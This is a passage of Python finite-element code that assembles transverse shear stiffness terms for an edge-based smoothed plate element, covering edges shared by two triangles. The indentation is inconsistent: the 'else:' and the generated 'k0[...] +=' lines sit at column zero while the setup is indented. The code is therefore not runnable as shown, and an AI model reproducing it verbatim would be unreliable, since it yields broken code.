k0[i3*dof+3, i2*dof+4] += b*c*(c*(E45*b - E55*a) - d*(E44*b - E45*a))/(16*(Ae*Ae))
k0[i3*dof+3, i3*dof+2] += c*(-a*(E45*b - E55*a) + b*(E44*b - E45*a))/(8*(Ae*Ae))
k0[i3*dof+3, i3*dof+3] += (c*c)*(-a*(E45*b - E55*a) + b*(E44*b - E45*a))/(16*(Ae*Ae))
k0[i3*dof+3, i3*dof+4] += c*d*(-a*(E45*b - E55*a) + b*(E44*b - E45*a))/(16*(Ae*Ae))
k0[i3*dof+4, i1*dof+2] += d*((a - c)*(E45*b - E55*a) - (b - d)*(E44*b - E45*a))/(8*(Ae*Ae))
k0[i3*dof+4, i1*dof+3] += d*(-E44*b + E45*a)/(8*Ae)
k0[i3*dof+4, i1*dof+4] += d*(-E45*b + E55*a)/(8*Ae)
k0[i3*dof+4, i2*dof+2] += d*(c*(E45*b - E55*a) - d*(E44*b - E45*a))/(8*(Ae*Ae))
k0[i3*dof+4, i2*dof+3] += a*d*(c*(E45*b - E55*a) - d*(E44*b - E45*a))/(16*(Ae*Ae))
k0[i3*dof+4, i2*dof+4] += b*d*(c*(E45*b - E55*a) - d*(E44*b - E45*a))/(16*(Ae*Ae))
k0[i3*dof+4, i3*dof+2] += d*(-a*(E45*b - E55*a) + b*(E44*b - E45*a))/(8*(Ae*Ae))
k0[i3*dof+4, i3*dof+3] += c*d*(-a*(E45*b - E55*a) + b*(E44*b - E45*a))/(16*(Ae*Ae))
k0[i3*dof+4, i3*dof+4] += (d*d)*(-a*(E45*b - E55*a) + b*(E44*b - E45*a))/(16*(Ae*Ae))
# Edge shared by two triangles (interior edge): blend both triangles'
# shear stiffnesses, each weighted by its sub-cell area fraction Ac1/Ac,
# Ac2/Ac of the edge-based smoothing cell.
else:
    # Shear correction factors for each adjacent triangle.
    # NOTE(review): 5/6 relies on true division (would be 0 under classic
    # Python 2 integer division) -- confirm `from __future__ import
    # division` or Python 3 at the file top.
    k1 = k2 = 5/6
    tria1 = edge.trias[0]
    tria2 = edge.trias[1]
    # Node of tria1 opposite to the shared edge.
    if not tria1.n1 in edge.nodes:
        other1 = tria1.n1
    elif not tria1.n2 in edge.nodes:
        other1 = tria1.n2
    elif not tria1.n3 in edge.nodes:
        other1 = tria1.n3
    else:
        raise RuntimeError('Invalid connectivity tria-edge')
    # Node of tria2 opposite to the shared edge.
    if not tria2.n1 in edge.nodes:
        other2 = tria2.n1
    elif not tria2.n2 in edge.nodes:
        other2 = tria2.n2
    elif not tria2.n3 in edge.nodes:
        other2 = tria2.n3
    else:
        raise RuntimeError('Invalid connectivity tria-edge')
    # Orient tria1's copy of the edge positively w.r.t. ZGLOBAL.
    if np.dot(np.cross((n2 - n1).pos, (other1 - n1).pos), ZGLOBAL) > 0:
        t1n1, t1n2 = n1, n2
    else:
        t1n1, t1n2 = n2, n1
    x1, y1, z1 = t1n1.pos
    x2, y2, z2 = t1n2.pos
    x3, y3, z3 = other1.pos
    # Tria1 local geometry: (a1, b1) edge vector, (c1, d1) to opposite node.
    a1 = x2 - x1
    b1 = y2 - y1
    c1 = x3 - x1
    d1 = y3 - y1
    Ae1 = tria1.Ae
    # Sub-cell area on the tria1 side: triangle (n1, n2, tria1 midpoint).
    tmp = [n1, n2, tria1.getMid()]
    Ac1 = area_of_polygon([n.pos[0] for n in tmp], [n.pos[1] for n in tmp])
    # Same construction for tria2 (note: x1..z3 are reused/overwritten).
    if np.dot(np.cross((n2 - n1).pos, (other2 - n1).pos), ZGLOBAL) > 0:
        t2n1, t2n2 = n1, n2
    else:
        t2n1, t2n2 = n2, n1
    x1, y1, z1 = t2n1.pos
    x2, y2, z2 = t2n2.pos
    x3, y3, z3 = other2.pos
    a2 = x2 - x1
    b2 = y2 - y1
    c2 = x3 - x1
    d2 = y3 - y1
    Ae2 = tria2.Ae
    # Sub-cell area on the tria2 side: triangle (n1, n2, tria2 midpoint).
    tmp = [n1, n2, tria2.getMid()]
    Ac2 = area_of_polygon([n.pos[0] for n in tmp], [n.pos[1] for n in tmp])
    # Area-weighted effective transverse shear stiffness of the edge cell.
    E = k1*Ac1/Ac*tria1.prop.E + k2*Ac2/Ac*tria2.prop.E
    E44 = E[0, 0]
    E45 = E[0, 1]
    E55 = E[1, 1]
    # Global DOF base indices.
    # NOTE(review): indices are taken from n1/n2 directly, not from the
    # reoriented t1n1/t2n1 -- presumably the orientation only affects the
    # local geometry (a, b, c, d), not the assembly ordering; confirm
    # against the generated expressions below.
    i1 = n1.index
    i2 = n2.index
    i3 = other1.index
    i4 = other2.index
k0[i1*dof+2, i1*dof+2] += ((E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - (E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(4*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i1*dof+2, i1*dof+3] += (Ac1 + Ac2)*(E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(4*(Ac*Ac)*Ae1*Ae2)
k0[i1*dof+2, i1*dof+4] += (Ac1 + Ac2)*(E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(4*(Ac*Ac)*Ae1*Ae2)
k0[i1*dof+2, i2*dof+2] += ((E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - (E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(4*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i1*dof+2, i2*dof+3] += ((E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - (E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(8*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i1*dof+2, i2*dof+4] += ((E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - (E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(8*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i1*dof+2, i3*dof+2] += Ac1*(a1*(E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))) - b1*(E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))))/(4*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i1*dof+2, i3*dof+3] += Ac1*c1*(a1*(E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))) - b1*(E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i1*dof+2, i3*dof+4] += Ac1*d1*(a1*(E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))) - b1*(E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i1*dof+2, i4*dof+2] += Ac2*(a2*(E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))) - b2*(E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))))/(4*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i1*dof+2, i4*dof+3] += Ac2*c2*(a2*(E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))) - b2*(E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i1*dof+2, i4*dof+4] += Ac2*d2*(a2*(E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))) - b2*(E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i1*dof+3, i1*dof+2] += (Ac1 + Ac2)*(E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(4*(Ac*Ac)*Ae1*Ae2)
k0[i1*dof+3, i1*dof+3] += E44*(Ac1 + Ac2)**2/(4*(Ac*Ac))
k0[i1*dof+3, i1*dof+4] += E45*(Ac1 + Ac2)**2/(4*(Ac*Ac))
k0[i1*dof+3, i2*dof+2] += (Ac1 + Ac2)*(E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(4*(Ac*Ac)*Ae1*Ae2)
k0[i1*dof+3, i2*dof+3] += (Ac1 + Ac2)*(E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i1*dof+3, i2*dof+4] += (Ac1 + Ac2)*(E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i1*dof+3, i3*dof+2] += Ac1*(Ac1 + Ac2)*(-E44*b1 + E45*a1)/(4*(Ac*Ac)*Ae1)
k0[i1*dof+3, i3*dof+3] += Ac1*c1*(Ac1 + Ac2)*(-E44*b1 + E45*a1)/(8*(Ac*Ac)*Ae1)
k0[i1*dof+3, i3*dof+4] += Ac1*d1*(Ac1 + Ac2)*(-E44*b1 + E45*a1)/(8*(Ac*Ac)*Ae1)
k0[i1*dof+3, i4*dof+2] += Ac2*(Ac1 + Ac2)*(-E44*b2 + E45*a2)/(4*(Ac*Ac)*Ae2)
k0[i1*dof+3, i4*dof+3] += Ac2*c2*(Ac1 + Ac2)*(-E44*b2 + E45*a2)/(8*(Ac*Ac)*Ae2)
k0[i1*dof+3, i4*dof+4] += Ac2*d2*(Ac1 + Ac2)*(-E44*b2 + E45*a2)/(8*(Ac*Ac)*Ae2)
k0[i1*dof+4, i1*dof+2] += (Ac1 + Ac2)*(E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(4*(Ac*Ac)*Ae1*Ae2)
k0[i1*dof+4, i1*dof+3] += E45*(Ac1 + Ac2)**2/(4*(Ac*Ac))
k0[i1*dof+4, i1*dof+4] += E55*(Ac1 + Ac2)**2/(4*(Ac*Ac))
k0[i1*dof+4, i2*dof+2] += (Ac1 + Ac2)*(E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(4*(Ac*Ac)*Ae1*Ae2)
k0[i1*dof+4, i2*dof+3] += (Ac1 + Ac2)*(E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i1*dof+4, i2*dof+4] += (Ac1 + Ac2)*(E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i1*dof+4, i3*dof+2] += Ac1*(Ac1 + Ac2)*(-E45*b1 + E55*a1)/(4*(Ac*Ac)*Ae1)
k0[i1*dof+4, i3*dof+3] += Ac1*c1*(Ac1 + Ac2)*(-E45*b1 + E55*a1)/(8*(Ac*Ac)*Ae1)
k0[i1*dof+4, i3*dof+4] += Ac1*d1*(Ac1 + Ac2)*(-E45*b1 + E55*a1)/(8*(Ac*Ac)*Ae1)
k0[i1*dof+4, i4*dof+2] += Ac2*(Ac1 + Ac2)*(-E45*b2 + E55*a2)/(4*(Ac*Ac)*Ae2)
k0[i1*dof+4, i4*dof+3] += Ac2*c2*(Ac1 + Ac2)*(-E45*b2 + E55*a2)/(8*(Ac*Ac)*Ae2)
k0[i1*dof+4, i4*dof+4] += Ac2*d2*(Ac1 + Ac2)*(-E45*b2 + E55*a2)/(8*(Ac*Ac)*Ae2)
k0[i2*dof+2, i1*dof+2] += ((E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2))*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - (E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2))*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(4*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+2, i1*dof+3] += (Ac1 + Ac2)*(E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(4*(Ac*Ac)*Ae1*Ae2)
k0[i2*dof+2, i1*dof+4] += (Ac1 + Ac2)*(E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(4*(Ac*Ac)*Ae1*Ae2)
k0[i2*dof+2, i2*dof+2] += ((E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2))*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - (E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2))*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(4*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+2, i2*dof+3] += ((E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2))*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - (E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2))*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(8*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+2, i2*dof+4] += ((E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2))*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - (E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2))*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(8*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+2, i3*dof+2] += Ac1*(a1*(E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2)) - b1*(E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2)))/(4*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i2*dof+2, i3*dof+3] += Ac1*c1*(a1*(E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2)) - b1*(E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2)))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i2*dof+2, i3*dof+4] += Ac1*d1*(a1*(E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2)) - b1*(E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2)))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i2*dof+2, i4*dof+2] += Ac2*(a2*(E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2)) - b2*(E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2)))/(4*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i2*dof+2, i4*dof+3] += Ac2*c2*(a2*(E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2)) - b2*(E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2)))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i2*dof+2, i4*dof+4] += Ac2*d2*(a2*(E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2)) - b2*(E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2)))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i2*dof+3, i1*dof+2] += ((E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - (E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(8*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+3, i1*dof+3] += (Ac1 + Ac2)*(E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i2*dof+3, i1*dof+4] += (Ac1 + Ac2)*(E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i2*dof+3, i2*dof+2] += ((E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - (E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(8*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+3, i2*dof+3] += ((E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - (E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(16*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+3, i2*dof+4] += ((E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - (E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(16*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+3, i3*dof+2] += Ac1*(a1*(E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)) - b1*(E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i2*dof+3, i3*dof+3] += Ac1*c1*(a1*(E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)) - b1*(E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)))/(16*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i2*dof+3, i3*dof+4] += Ac1*d1*(a1*(E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)) - b1*(E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)))/(16*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i2*dof+3, i4*dof+2] += Ac2*(a2*(E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)) - b2*(E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i2*dof+3, i4*dof+3] += Ac2*c2*(a2*(E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)) - b2*(E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)))/(16*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i2*dof+3, i4*dof+4] += Ac2*d2*(a2*(E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)) - b2*(E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2)))/(16*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i2*dof+4, i1*dof+2] += ((E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - (E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(8*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+4, i1*dof+3] += (Ac1 + Ac2)*(E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i2*dof+4, i1*dof+4] += (Ac1 + Ac2)*(E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i2*dof+4, i2*dof+2] += ((E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - (E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(8*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+4, i2*dof+3] += ((E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - (E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(16*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+4, i2*dof+4] += ((E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - (E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(16*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i2*dof+4, i3*dof+2] += Ac1*(a1*(E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)) - b1*(E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i2*dof+4, i3*dof+3] += Ac1*c1*(a1*(E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)) - b1*(E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)))/(16*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i2*dof+4, i3*dof+4] += Ac1*d1*(a1*(E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)) - b1*(E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)))/(16*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i2*dof+4, i4*dof+2] += Ac2*(a2*(E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)) - b2*(E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2)))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
